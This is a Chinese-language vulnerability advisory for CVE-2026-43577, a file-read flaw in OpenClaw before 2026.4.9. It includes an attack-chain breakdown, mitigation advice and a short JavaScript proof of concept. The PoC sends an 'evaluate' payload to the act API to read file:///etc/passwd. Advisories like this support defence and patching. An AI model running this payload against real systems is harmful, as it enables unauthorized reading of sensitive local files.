CVE-2026-43577 CVSS 6.5 中危

CVE-2026-43577 OpenClaw文件读取漏洞

披露日期: 2026-05-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-43577

漏洞类型

文件读取

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 版本 2026.4.9 之前存在一处文件读取安全漏洞。该漏洞源于程序未能正确处理浏览器的 act/evaluate 交互，导致攻击者能够绕过导航守卫机制。利用此漏洞，攻击者可以转向本地 Chrome DevTools Protocol (CDP) 源，并在尽管存在直接导航策略限制的情况下，创建或读取本地的 file:// 协议页面，从而获取敏感文件内容。

技术细节

该漏洞的核心机制在于 OpenClaw 未能有效隔离通过 `act/evaluate` 接口发起的浏览器交互与正常的页面导航。在 OpenClaw 的安全模型中，导航守卫主要用于拦截直接的 URL 跳转请求，特别是对 `file://` 协议的访问。然而，攻击者可以通过调用浏览器底层的评估接口，利用其与本地 Chrome DevTools Protocol (CDP) 的信任关系进行“源转向”。一旦攻击上下文被切换至本地的 CDP 源，浏览器的同源策略和导航限制可能被绕过。攻击者利用这一逻辑缺陷，构造特定的 JavaScript 代码或 CDP 指令，在无需用户交互的情况下，读取或创建原本被策略禁止访问的本地文件系统资源，从而导致敏感数据泄露。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行的是 OpenClaw 2026.4.9 之前的版本。

STEP 2

初始访问

攻击者获得对目标应用的网络访问权限，且仅需低权限用户身份（PR:L）。

STEP 3

漏洞利用

攻击者向 OpenClaw 的浏览器交互接口（act/evaluate）发送特制请求，利用该接口绕过导航守卫机制。

STEP 4

权限提升/源转向

利用浏览器与本地 CDP 的交互，将执行上下文转向本地 Chrome DevTools Protocol (CDP) 源。

STEP 5

数据渗漏

利用 CDP 源的权限，读取或创建原本受策略限制的 file:// 页面，获取本地敏感文件信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-43577: OpenClaw Arbitrary File Read
// This script demonstrates bypassing navigation guards via browser interaction.

async function triggerVulnerability(targetUrl) {
    try {
        // Step 1: Initiate interaction to bypass navigation guard
        // Using the vulnerable 'act/evaluate' route
        const payload = {
            action: 'evaluate',
            code: `
                // Malicious code execution context
                // Pivot to local CDP origin
                const cdpOrigin = window.location.origin;
                
                // Attempt to read local file via file:// protocol
                fetch('file:///etc/passwd')
                    .then(response => response.text())
                    .then(data => console.log('[+] Leak:', data))
                    .catch(err => console.error('[-] Error:', err));
            `
        };

        // Send the malicious request to the target OpenClaw instance
        const response = await fetch(targetUrl + '/api/act', {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' },
            body: JSON.stringify(payload)
        });

        console.log('[*] Payload sent, check console for file content.');
    } catch (error) {
        console.error('Exploit failed:', error);
    }
}

// Usage: triggerVulnerability('http://target-openclaw-instance');

影响范围

OpenClaw < 2026.4.9

防御指南

临时缓解措施

建议立即升级至修复版本。在无法立即升级的情况下，应通过网络 ACL 或防火墙规则限制对 OpenClaw 服务中 `/act` 和 `/evaluate` 路径的访问，并禁用或隔离对 Chrome DevTools Protocol (CDP) 端口的访问，以阻断攻击路径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表